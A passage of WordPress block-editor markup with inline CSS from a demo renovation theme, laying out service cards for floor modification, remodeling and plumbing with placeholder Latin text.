976px){\n\n.skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Floor Modification</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"9578d473-607c-475f-8a43-4b09d3587ad4\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-9578d473-607c-475f-8a43-4b09d3587ad4 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-9578d473-607c-475f-8a43-4b09d3587ad4 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-9578d473-607c-475f-8a43-4b09d3587ad4 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-9578d473-607c-475f-8a43-4b09d3587ad4 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-9578d473-607c-475f-8a43-4b09d3587ad4 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-9578d473-607c-475f-8a43-4b09d3587ad4\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"ea617752-1569-4708-b405-78bb3af43fd1\"} -->\n<style type=\"text/css\"> .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1 .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-ea617752-1569-4708-b405-78bb3af43fd1 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Remodeling</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"76608f47-a3e2-4ed4-8970-304ac9a10cdd\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-76608f47-a3e2-4ed4-8970-304ac9a10cdd .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-76608f47-a3e2-4ed4-8970-304ac9a10cdd .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-76608f47-a3e2-4ed4-8970-304ac9a10cdd .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-76608f47-a3e2-4ed4-8970-304ac9a10cdd .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-76608f47-a3e2-4ed4-8970-304ac9a10cdd .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-76608f47-a3e2-4ed4-8970-304ac9a10cdd\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"ff21599b-d768-4344-aac9-c80e2a072add\"} -->\n<style type=\"text/css\"> .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-ff21599b-d768-4344-aac9-c80e2a072add skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Plumbing</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"78221ba9-9cd0-45e0-91d8-d1afeb9d348f\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-78221ba9-9cd0-45e0-91d8-d1afeb9d348f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"5b99e3a9-5387-4618-a3be-43eebd98a6ad\"} -->\n<style type=\"text/css\"> .block-5b99e3a9-5387-4618-a3be-43eebd98a6ad .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-5b99e3a9-5387-4618-a3be-43eebd98a6ad .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-5b99e3a9-5387-4618-a3be-43eebd98a6ad .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-5b99e3a9-5387-4618-a3be-43eebd98a6ad .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-5b99e3a9-5387-4618-a3be-43eebd98a6ad .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-5b99e3a9-5387-4618-a3be-43eebd98a6ad .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5b99e3a9-5387-4618-a3be-43eebd98a6ad .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-5b99e3a9-5387-4618-a3be-43eebd98a6ad skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"66c3ba40-c66d-4ac3-8e69-fff60dd46f1c\"} -->\n<style type=\"text/css\"> .block-66c3ba40-c66d-4ac3-8e69-fff60dd46f1c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-66c3ba40-c66d-4ac3-8e69-fff60dd46f1c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-66c3ba40-c66d-4ac3-8e69-fff60dd46f1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-66c3ba40-c66d-4ac3-8e69-fff60dd46f1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-66c3ba40-c66d-4ac3-8e69-fff60dd46f1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-66c3ba40-c66d-4ac3-8e69-fff60dd46f1c\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading 